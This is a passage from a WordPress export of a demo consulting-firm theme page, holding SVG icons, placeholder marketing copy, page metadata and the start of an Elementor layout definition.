		<path d="M436.275,39.807H304.797C300.155,17.119,280.039,0,256,0s-44.156,17.119-48.798,39.807H75.725    c-14.771,0-26.789,12.018-26.789,26.789V351.16c0,14.771,12.017,26.789,26.789,26.789H200.63l-40.566,120.866    c-1.757,5.235,1.063,10.904,6.299,12.662c1.055,0.354,2.128,0.522,3.183,0.522c4.179,0,8.076-2.641,9.479-6.821l42.702-127.229    h68.546l42.702,127.229c1.403,4.181,5.3,6.821,9.479,6.821c1.055,0,2.128-0.169,3.183-0.522c5.236-1.758,8.056-7.427,6.299-12.662    l-40.566-120.866h124.905c14.771,0,26.789-12.018,26.789-26.789V66.596C463.063,51.824,451.046,39.807,436.275,39.807z M256,20    c12.93,0,23.963,8.274,28.082,19.807h-56.163C232.038,28.274,243.071,20,256,20z M443.063,351.16c0,3.743-3.045,6.789-6.789,6.789    h-26.121v-142.56c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10V357.95H359.39V245.979c0-5.522-4.477-10-10-10    c-5.523,0-10,4.478-10,10v111.97h-28.084v-79.255c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v79.255h-25.308V253.277    c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v104.672h-29.037v-55.023c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v55.023    h-23.221v-50.985c0-5.522-4.477-10-10-10s-10,4.478-10,10v50.985h-26.777v-39.337c0-5.522-4.477-10-10-10s-10,4.478-10,10v39.337    h-31.24c-3.743,0-6.789-3.046-6.789-6.789V66.596c0-3.743,3.045-6.789,6.789-6.789h140.468h79.614h140.468    c3.743,0,6.789,3.046,6.789,6.789V351.16z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M410.105,106.884c-0.013-0.137-0.039-0.269-0.058-0.404c-0.026-0.188-0.049-0.377-0.086-0.564    c-0.031-0.158-0.075-0.312-0.114-0.467c-0.04-0.161-0.076-0.323-0.124-0.482c-0.046-0.153-0.104-0.301-0.158-0.451    c-0.056-0.158-0.109-0.317-0.173-0.473c-0.058-0.139-0.125-0.272-0.189-0.407c-0.075-0.161-0.147-0.323-0.231-0.48    c-0.068-0.127-0.146-0.249-0.22-0.373c-0.093-0.156-0.181-0.314-0.283-0.466c-0.089-0.134-0.19-0.259-0.285-0.388    c-0.098-0.133-0.191-0.268-0.297-0.397c-0.179-0.218-0.37-0.425-0.567-0.627c-0.033-0.033-0.06-0.07-0.093-0.103    c-0.032-0.032-0.068-0.059-0.1-0.09c-0.203-0.198-0.412-0.39-0.631-0.57c-0.122-0.1-0.25-0.188-0.376-0.281    c-0.136-0.102-0.269-0.207-0.41-0.302c-0.144-0.096-0.293-0.179-0.44-0.267c-0.133-0.08-0.264-0.163-0.401-0.237    c-0.146-0.078-0.296-0.144-0.445-0.214c-0.147-0.07-0.292-0.143-0.444-0.206c-0.141-0.058-0.285-0.105-0.427-0.156    c-0.166-0.06-0.329-0.123-0.499-0.174c-0.139-0.042-0.279-0.072-0.419-0.108c-0.176-0.045-0.35-0.094-0.53-0.129    c-0.156-0.031-0.314-0.049-0.471-0.072c-0.166-0.025-0.329-0.055-0.497-0.072c-0.267-0.026-0.535-0.036-0.804-0.041    c-0.06-0.001-0.118-0.009-0.178-0.009h-43.197c-5.523,0-10,4.478-10,10s4.477,10,10,10h19.054l-83.028,83.028l-21.797-21.798    c-1.875-1.875-4.419-2.929-7.071-2.929s-5.196,1.054-7.071,2.929l-72.161,72.162l-21.543-21.543    c-3.905-3.904-10.237-3.904-14.142,0l-36.492,36.492c-3.905,3.905-3.905,10.237,0,14.143c1.953,1.952,4.512,2.929,7.071,2.929    c2.559,0,5.119-0.977,7.071-2.929l29.42-29.421l21.543,21.542c3.905,3.904,10.237,3.904,14.142,0l72.161-72.161l21.797,21.798    c1.875,1.875,4.419,2.929,7.071,2.929s5.196-1.054,7.071-2.929l90.099-90.099v19.054c0,5.522,4.477,10,10,10    c5.523,0,10-4.478,10-10v-43.191C410.155,107.546,410.138,107.214,410.105,106.884z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="107.869" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="148.639" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="189.409" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="#">Consulting</a></h5>				<p>We’ve been a strategy thought leader for nearly five decades
and we bring unrivaled </p>			
        			<a href="#"class="link-details"> Explore More </a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M473.492,189.736h-0.001l-22.417-2.651c-2.44-6.903-5.255-13.693-8.412-20.293l13.979-17.731    c13.686-17.358,13.649-40.806-0.084-54.541l-39.083-39.083c-13.734-13.734-37.182-13.771-54.543-0.083l-17.73,13.981    c-6.603-3.159-13.393-5.974-20.294-8.412l-2.651-22.417C319.659,16.554,303.054,0,283.63,0h-55.271    c-19.424,0-36.03,16.555-38.626,38.51l-2.65,22.417c-6.899,2.439-13.684,5.251-20.284,8.408l-17.73-13.981    c-17.359-13.687-40.807-13.653-54.543,0.083L55.444,94.519c-13.734,13.735-13.771,37.183-0.084,54.541l13.979,17.73    c-3.159,6.602-5.974,13.392-8.413,20.293l-22.418,2.651C16.555,192.33,0,208.935,0,228.359v55.271    c0,19.423,16.554,36.029,38.506,38.624l22.417,2.652c2.438,6.902,5.253,13.692,8.411,20.294l-13.981,17.731    c-13.688,17.359-13.652,40.807,0.083,54.542l39.082,39.083c13.733,13.733,37.182,13.771,54.541,0.084l17.73-13.979    c6.603,3.159,13.393,5.974,20.294,8.413l2.65,22.417C192.329,495.445,208.934,512,228.359,512h55.271    c19.424,0,36.029-16.554,38.626-38.507l2.651-22.416c6.906-2.44,13.698-5.255,20.304-8.416l17.73,13.98    c17.359,13.684,40.807,13.65,54.541-0.085l39.082-39.082c13.734-13.734,13.771-37.182,0.083-54.542l-13.981-17.731    c3.158-6.602,5.973-13.392,8.411-20.294l22.416-2.652C495.445,319.658,512,303.053,512,283.63v-55.271    C512,208.935,495.445,192.33,473.492,189.736z M492,283.63c0,9.291-8.966,17.357-20.854,18.763l-28.704,3.396    c-3.897,0.461-7.165,3.16-8.354,6.9c-3.183,10.008-7.246,19.808-12.073,29.128c-1.807,3.487-1.406,7.709,1.026,10.792    l17.904,22.706c7.413,9.403,8.049,21.448,1.479,28.017l-39.082,39.083c-6.57,6.569-18.614,5.934-28.016-1.479l-22.706-17.903    c-3.083-2.431-7.303-2.833-10.792-1.026c-9.325,4.831-19.128,8.895-29.136,12.078c-3.74,1.189-6.439,4.457-6.9,8.355    l-3.396,28.705c-1.407,11.89-9.474,20.856-18.765,20.856H228.36c-9.292,0-17.359-8.967-18.765-20.857l-3.394-28.706    c-0.461-3.897-3.159-7.166-6.899-8.355c-10.006-3.183-19.806-7.246-29.129-12.076c-1.451-0.752-3.029-1.121-4.598-1.121    c-2.204,0-4.392,0.727-6.193,2.149l-22.706,17.902c-9.403,7.414-21.448,8.047-28.016,1.479l-39.082-39.083    c-6.571-6.57-5.935-18.614,1.479-28.016l17.904-22.707c2.431-3.084,2.833-7.306,1.026-10.792    c-4.827-9.319-8.889-19.12-12.073-29.128c-1.189-3.74-4.457-6.439-8.354-6.9l-28.705-3.396C28.966,300.987,20,292.921,20,283.63    v-55.271c0-9.291,8.967-17.358,20.857-18.764l28.706-3.394c3.898-0.461,7.166-3.159,8.355-6.899    c3.183-10.006,7.246-19.807,12.075-29.129c1.807-3.486,1.406-7.708-1.026-10.791l-17.902-22.706    c-7.414-9.402-8.049-21.446-1.479-28.016l39.081-39.083c6.569-6.57,18.615-5.935,28.017,1.48l22.706,17.904    c3.083,2.431,7.304,2.834,10.791,1.027c9.318-4.827,19.115-8.888,29.12-12.071c3.74-1.189,6.438-4.457,6.899-8.355l3.394-28.705    C211.001,28.967,219.067,20,228.359,20h55.271c9.291,0,17.358,8.966,18.764,20.855l3.396,28.705c0.461,3.898,3.16,7.166,6.9,8.355    c10.005,3.181,19.806,7.244,29.128,12.073c3.484,1.807,7.708,1.406,10.792-1.026l22.706-17.904    c9.404-7.412,21.448-8.051,28.017-1.48l39.083,39.082c6.569,6.57,5.933,18.614-1.479,28.016l-17.903,22.707    c-2.431,3.084-2.833,7.305-1.026,10.792c4.827,9.315,8.889,19.115,12.075,29.127c1.189,3.74,4.457,6.439,8.355,6.899l28.706,3.394    h-0.001c11.89,1.406,20.857,9.473,20.857,18.764V283.63z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M255.999,94.28c-89.173,0-161.721,72.548-161.721,161.721c0,35.631,11.362,69.426,32.86,97.729    c20.797,27.382,50.325,47.78,83.142,57.435c5.301,1.56,10.856-1.473,12.416-6.771c1.559-5.298-1.472-10.857-6.771-12.416    C156.078,374.37,114.279,318.454,114.279,256c0-78.145,63.575-141.721,141.721-141.721S397.721,177.855,397.721,256    c0,64.606-43.619,121.026-106.076,137.203c-5.346,1.385-8.558,6.842-7.173,12.188c1.167,4.506,5.226,7.495,9.674,7.495    c0.831,0,1.674-0.104,2.515-0.322C367.94,394.102,417.721,329.72,417.721,256C417.721,166.827,345.172,94.28,255.999,94.28z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M334.324,302.94L266,251.038v-44.663c0-5.523-4.478-10-10-10c-5.522,0-10,4.477-10,10V256    c0,3.126,1.462,6.072,3.952,7.962l72.275,54.903c1.809,1.374,3.933,2.038,6.041,2.038c3.019,0,6.003-1.361,7.97-3.951    C339.579,312.554,338.722,306.281,334.324,302.94z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="256" cy="164.02" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="252.36" cy="407.72" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="#">Planning</a></h5>				<p>We’ve been a strategy thought leader for nearly five decades
and we bring unrivaled </p>			
        			<a href="#"class="link-details"> Explore More </a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M489.129,42.371h-32.011V10c0-5.523-4.477-10-10-10s-10,4.477-10,10v38.237l-41.806,41.92    c-42.173-38.385-96.385-59.418-153.76-59.418c-61.083,0-118.511,23.787-161.703,66.979C36.657,140.91,12.87,198.338,12.87,259.421    s23.787,118.511,66.979,161.703c6.719,6.719,13.783,12.967,21.151,18.73l-55.074,55.074c-3.905,3.905-3.905,10.237,0,14.143    c1.953,1.952,4.512,2.929,7.071,2.929c2.559,0,5.119-0.977,7.071-2.929l57.452-57.453c36.629,23.742,79.348,36.485,124.031,36.485    c44.901,0,87.818-12.868,124.566-36.833l57.801,57.801c1.953,1.952,4.512,2.929,7.071,2.929c2.559,0,5.119-0.977,7.071-2.929    c3.905-3.905,3.906-10.237,0-14.143l-55.467-55.467c7.19-5.656,14.092-11.769,20.661-18.337    c43.192-43.192,66.979-100.62,66.979-161.703c0-34.789-7.614-68.199-22.63-99.303c-2.401-4.974-8.381-7.06-13.353-4.658    c-4.974,2.401-7.059,8.379-4.658,13.353c13.696,28.37,20.641,58.855,20.641,90.608c0,115.068-93.615,208.683-208.683,208.683    S32.867,374.49,32.867,259.421c0-115.068,93.615-208.683,208.683-208.683c52.045,0,101.242,18.958,139.627,53.59l-35.099,35.195    c-28.976-25.325-65.717-39.171-104.527-39.171c-87.711,0-159.069,71.358-159.069,159.069s71.36,159.069,159.071,159.069    s159.069-71.358,159.069-159.069c0-14.146-1.859-28.178-5.527-41.708c-6.436-23.746-18.393-45.726-34.797-64.125l42.276-42.391    c0.013-0.013,0.028-0.024,0.041-0.037c0.012-0.012,0.021-0.025,0.033-0.036l48.621-48.753h37.861c5.523,0,10-4.477,10-10    S494.652,42.371,489.129,42.371z M375.792,222.945c3.206,11.825,4.831,24.097,4.831,36.476    c0,76.683-62.386,139.069-139.069,139.069s-139.069-62.387-139.069-139.069s62.386-139.069,139.069-139.069    c33.479,0,65.202,11.779,90.375,33.362l-41.285,41.397c-13.628-10.428-30.644-16.643-49.09-16.643    c-44.637,0-80.953,36.315-80.953,80.953s36.315,80.953,80.953,80.953s80.953-36.315,80.953-80.953    c0-18.997-6.594-36.473-17.592-50.297l41.232-41.344C360.089,183.686,370.271,202.573,375.792,222.945z M235.828,264.236    c1.952,1.946,4.507,2.919,7.062,2.919c2.563,0,5.127-0.979,7.081-2.938l40.71-40.821c7.426,10.1,11.825,22.556,11.825,36.025    c0,33.609-27.343,60.953-60.953,60.953c-33.61,0-60.953-27.344-60.953-60.953s27.343-60.953,60.953-60.953    c12.935,0,24.933,4.062,34.81,10.961l-40.554,40.664C231.909,254.004,231.917,260.335,235.828,264.236z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="419.22" cy="133.64" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="#">Strategy</a></h5>				<p>We’ve been a strategy thought leader for nearly five decades
and we bring unrivaled </p>			
        			<a href="#"class="link-details"> Explore More </a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<circle cx="87.43" cy="406.69" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="470.4" cy="287.44" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<path d="M354.647,212.344h-5.797h-3.761h-5.797c-4.854,0-8.802-3.948-8.802-8.802v-8.931c0.001-4.854,3.949-8.802,8.802-8.802    h17.012c3.939,0,7.145,3.204,7.145,7.144c0,5.522,4.478,10,10,10c5.522,0,10-4.478,10-10c0-14.743-11.818-26.771-26.479-27.127    v-8.584c0-5.522-4.478-10-10-10c-5.522,0-10,4.478-10,10v8.669c-14.798,1.188-26.479,13.602-26.479,28.7v8.931    c0,15.881,12.921,28.802,28.802,28.802h5.797h3.761h5.797c4.854,0,8.802,3.948,8.802,8.801v8.932c0,4.853-3.948,8.801-8.802,8.801    h-17.012c-3.939,0-7.145-3.204-7.145-7.144c0-5.522-4.478-10-10-10c-5.522,0-10,4.478-10,10c0,14.744,11.819,26.771,26.479,27.127    v8.584c0,5.522,4.478,10,10,10c5.522,0,10-4.478,10-10v-8.669c14.798-1.188,26.479-13.601,26.479-28.699v-8.932    C383.449,225.264,370.528,212.344,354.647,212.344z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M499.899,339.009c-4.115-9.319-11.613-16.479-21.112-20.159c-9.499-3.68-19.864-3.442-29.183,0.675    c-0.05,0.021-0.1,0.044-0.148,0.066l-62.989,29.048c-5.016,2.313-7.206,8.254-4.894,13.269c2.313,5.016,8.255,7.205,13.269,4.894    l62.908-29.011c4.415-1.927,9.317-2.03,13.813-0.291c4.518,1.751,8.083,5.155,10.04,9.588c1.958,4.433,2.071,9.361,0.321,13.879    c-1.751,4.519-5.155,8.084-9.588,10.041l-128.9,56.914c-20.326,8.975-43.397,8.453-63.301-1.435l-47.185-23.441    c-25.238-12.539-54.498-13.204-80.277-1.819l-0.6,0.264l-34.973-79.21l48.628-21.47c23.239-10.261,49.169-11.087,73.012-2.332    l94.885,34.845c8.475,3.112,12.992,12.594,10.069,21.135c-2.978,8.704-12.491,13.387-21.205,10.44l-73.375-24.818    c-5.233-1.77-10.907,1.037-12.677,6.269c-1.77,5.232,1.037,10.907,6.269,12.677l73.375,24.818    c3.88,1.313,7.831,1.936,11.721,1.936c15.283,0,29.606-9.62,34.816-24.848c6.413-18.746-3.501-39.553-22.099-46.382    l-94.885-34.845c-6.382-2.344-12.888-4.115-19.454-5.321v-55.277c0-54.504,44.343-98.847,98.847-98.847h36.524    c54.505,0,98.848,44.343,98.848,98.847v26.061c0,5.522,4.478,10,10,10c5.522,0,10-4.478,10-10v-26.061    c0-57.721-41.365-105.956-96.008-116.636V72.349l25.267-43.222c1.429-2.443,1.755-5.378,0.897-8.075    c-0.858-2.697-2.817-4.905-5.394-6.076l-30.99-14.08c-2.373-1.078-5.072-1.187-7.523-0.305l-22.995,8.276l-20.396-8.153    c-2.345-0.936-4.956-0.951-7.312-0.044l-32.428,12.511c-2.698,1.041-4.813,3.2-5.801,5.919c-0.986,2.719-0.748,5.731,0.655,8.261    l24.881,44.867v30.038c-55.169,10.258-97.072,58.744-97.072,116.84v53.36c-16.52-0.156-33.022,3.199-48.53,10.046l-48.99,21.63    c-2.806-4.199-6.808-7.445-11.615-9.307c-6.172-2.392-12.907-2.236-18.938,0.427l-63.29,27.733    c-3.637,1.594-5.986,5.188-5.986,9.159V502c0,3.473,1.802,6.697,4.76,8.518c1.603,0.985,3.419,1.482,5.24,1.482    c1.542,0,3.088-0.356,4.509-1.074l122.873-62.071c5.926-2.698,10.477-7.518,12.833-13.6c1.925-4.969,2.199-10.302,0.839-15.352    l0.865-0.382c20.327-8.977,43.401-8.454,63.301,1.435l47.185,23.442c25.239,12.536,54.498,13.199,80.277,1.818l128.9-56.914    c9.319-4.114,16.479-11.612,20.159-21.111C504.252,358.692,504.013,348.328,499.899,339.009z M364.391,100.259h-2.84h-36.524    h-1.775V79.641h41.139V100.259z M301.431,27.704l18.049-6.961l20.275,8.105c2.272,0.908,4.798,0.953,7.099,0.123l22.744-8.187    l17.201,7.815l-18.146,31.04h-49.512L301.431,27.704z M137.868,430.678c-0.158,0.07-0.315,0.145-0.47,0.223L28.831,485.745    v-40.524l28.113-13.805c4.958-2.435,7.003-8.427,4.569-13.384c-2.435-4.958-8.425-7.005-13.384-4.569l-19.299,9.476V338.69    l57.329-25.122c1.575-0.694,2.97-0.352,3.661-0.084c0.689,0.268,1.951,0.951,2.647,2.528l2.292,5.19    c0.001,0.002,0.001,0.004,0.002,0.006c0.001,0.002,0.002,0.004,0.003,0.006l45.546,103.154    C141.377,426.782,140.282,429.612,137.868,430.678z"></path>
	</g>
</g>
</svg>	        
				<h5><a href="#">Support</a></h5>				<p>We’ve been a strategy thought leader for nearly five decades
and we bring unrivaled </p>			
        			<a href="#"class="link-details"> Explore More </a>
			<h2>Looking for a First-Class Finance Firm?</h2>		
		<p>We welcome and celebrate different perspectives to help our firm, our clients and our people.</p>		
			<a href="http://wpdemo.archiwp.com/maxbizz/contact-us">get in touch</a>
	        reliable & safe	        <h3>Our Strategy Development</h3>	    
						<ul>
								<li data-tab="tab-170">Research</li>
								<li data-tab="tab-270">aproach</li>
								<li data-tab="tab-370">result</li>
							</ul>
				<p>We are working in the format of an outsourcing project office. We assume operational coordination and control over the compliance with all project implementation parameters that ensures the execution of works on time.</p><p>Integrated career development, business consulting and digital media solutions connect your vision to results. Instead of quick-fix, out of the box, buy-in-bulk products, I develop highly customized solutions.</p>			
				<p>We can definitely define the provided level and range of Synergy Development Consulting as a full-cycle support. Therefore, we treat each client as an equal partner in the long term. Our team consists of talented and motivated people who are united by love to their work!</p><p>Integrated career development, business consulting and digital media solutions connect your vision to results. Instead of quick-fix, out of the box, buy-in-bulk products, I develop highly customized solutions.</p>			
				<p>Successful experience of experts in structuring investment projects, developing and implementing construction, developers and energy projects, restructuring programs, etc. provides a positive impact on your company profitability.</p><p>Integrated career development, business consulting and digital media solutions connect your vision to results. Instead of quick-fix, out of the box, buy-in-bulk products, I develop highly customized solutions.</p>			
			<a href="#">Explore More </a>
										<img width="466" height="296" src="https://maxbizz.s3.amazonaws.com/images/chart1-service-home5.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart1-service-home5.png 466w, https://maxbizz.s3.amazonaws.com/images/chart1-service-home5-300x191.png 300w" sizes="(max-width: 466px) 100vw, 466px" />]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>959</wp:post_id>
		<wp:post_date><![CDATA[2020-09-17 04:03:11]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-17 04:03:11]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[organizational-audit]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[869]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"41c2f83","elType":"section","settings":{"padding":{"unit":"px","top":"90","right":"0","bottom":"0","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"99e32eb","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"bbf118c","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"20","background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/slider2-home2.jpg","id":1317},"background_position":"center center","background_position_mobile":"center left","background_repeat":"no-repeat","background_size":"cover","background_size_tablet":"cover","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"padding":{"unit":"px","top":"120","right":"0","bottom":"120","left":"100","isLinked":false},"padding_tablet":{"unit":"px","top":"110","right":"0","bottom":"110","left":"60","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"30","isLinked":false}},"elements":[{"id":"5e47caf","elType":"column","settings":{"_column_size":50,"_inline_size":44.63600000000000278532752417959272861480712890625,"_inline_size_tablet":70,"_inline_size_mobile":100},"elements":[{"id":"4376d3b","elType":"widget","settings":{"title":"how we help","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":14,"sizes":[]},"typography_font_weight":"600","typography_text_transform":"uppercase","_padding":{"unit":"px","top":"0","right":"0","bottom":"18","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"1e1f3f6","elType":"widget","settings":{"title":"Align Costs with Strategy & Focus on Growth","header_size":"h1","title_color":"#1B1D21","typography_typography":"custom","typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"typography_font_weight":"400","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"bb56b1a","elType":"widget","settings":{"btn_style":"dark","text":"get in touch"},"elements":[],"widgetType":"ibutton"}],"isInner":true},{"id":"a57cea8","elType":"column","settings":{"_column_size":50,"_inline_size":55.36399999999999721467247582040727138519287109375,"_inline_size_tablet":30,"_inline_size_mobile":100},"elements":[],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"c25f6a6","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"95","right":"0","bottom":"130","left":"0","isLinked":false},"padding_tablet":{"unit":"px","top":"95","right":"0","bottom":"90","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"2385c34","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[{"id":"b25f0cc","elType":"widget","settings":{"sub":"main principles","title":"Global Reach with Local  Understanding","header_size":"h3","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]},"stitle_color":"#52C5B6","stitle_typography_font_weight":"600"},"elements":[],"widgetType":"iheading"},{"id":"cf25bf5","elType":"widget","settings":{"ot_accs":[{"acc_title":"In what areas do you provide management consulting?","acc_content":"<p>Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention.<\/p>","_id":"cab9896"},{"acc_title":"In which countries do you provide consulting services?","acc_content":"<p>Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention.<\/p>","_id":"d505a0a"},{"acc_title":"How is a consulting project started and organized?","acc_content":"<p>Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention.<\/p>","_id":"5303f19"}],"_padding":{"unit":"px","top":"0","right":"50","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[],"widgetType":"iaccordions"}],"isInner":false},{"id":"018e51c","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"9b39923","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-values-home-5.png","id":2364},"image_size":"full","align":"left","_margin":{"unit":"px","top":"0","right":"0","bottom":"-30","left":"-30","isLinked":false},"_margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"a1952ca","elType":"section","settings":{"background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg2-service-detail2.jpg","id":970},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"100","right":"0","bottom":"100","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"80","right":"0","bottom":"80","left":"0","isLinked":false}},"elements":[{"id":"ec49fa5","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"1b5272a","elType":"widget","settings":{"sub":"our benefits","title":"Why Clients Choose Us","header_size":"h3","align":"center","title_color":"#FFFFFF","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false},"is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]},"stitle_color":"#FFFFFF","stitle_typography_font_weight":"600"},"elements":[],"widgetType":"iheading"},{"id":"2d7dbb6","elType":"section","settings":{"gap":"extended","structure":"40","layout":"full_width"},"elements":[{"id":"d6df67f","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"80fa6cf","elType":"widget","settings":{"align":"left","icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart.svg","id":653},"library":"svg"},"title":"Consulting","des":"We\u2019ve been a strategy thought leader for nearly five decades\nand we bring unrivaled ","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More ","is_line":"","box_padding":{"unit":"px","top":"29","right":"29","bottom":"29","left":"29","isLinked":true},"bg_hover_icon_bg":"#FFFFFF1A","bg_hover_des_color":"#FFFFFF","is_border":"","icon_space":{"unit":"px","size":30,"sizes":[]},"icon_size":{"unit":"px","size":32,"sizes":[]},"icon_bg_width":{"unit":"px","size":65,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":24,"sizes":[]},"title_typography_font_weight":"400","des_color":"#60626D","des_typography_typography":"custom","des_typography_font_family":"Open 